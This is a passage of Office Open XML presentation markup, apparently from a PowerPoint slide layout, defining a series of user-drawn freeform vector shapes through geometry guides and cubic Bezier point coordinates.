                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="57"/>
                      <a:pt x="64" y="58"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="65"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="64"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="57"/>
                      <a:pt x="103" y="57"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="68"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="68"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="39"/>
                      <a:pt x="71" y="39"/>
                      <a:pt x="71" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="100" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="2978"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 1 h 3"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1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2" y="1"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="1"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>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Freeform 87"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="2978"/>
                <a:ext cx="4" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2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2"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Freeform 88"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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7"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Freeform 89"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="3657"/>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Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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6" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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7" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="3657"/>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96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30"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98"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="366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2" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="26"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="103"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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3" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="3663"/>
                <a:ext cx="77" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 240"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 240"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 240 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 240"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 240"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 42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4" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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6" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982"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8" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="3657"/>
                <a:ext cx="82"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Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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0" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477"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3"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Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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2" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="3657"/>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3" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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4" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="636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Freeform 113"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="655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7" name="Freeform 114"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="675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8" name="Freeform 115"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897"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2" y="26"/>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Freeform 116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="3663"/>
                <a:ext cx="78"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2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Freeform 117"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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Freeform 118"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311"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Freeform 119"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509"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Freeform 120"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657"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Freeform 121"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="3650"/>
                <a:ext cx="218" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 83 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 27 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 128 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 186 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160 w 179"/>
                  <a:gd name="T41" fmla="*/ 153 h 209"/>
                  <a:gd name="T42" fmla="*/ 88 w 179"/>
                  <a:gd name="T43" fmla="*/ 72 h 209"/>
                  <a:gd name="T44" fmla="*/ 101 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79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8 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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1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5"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="208"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="207"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="71" y="199"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="203"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="196"/>
                      <a:pt x="4" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="8" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="16"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="159" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="158" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
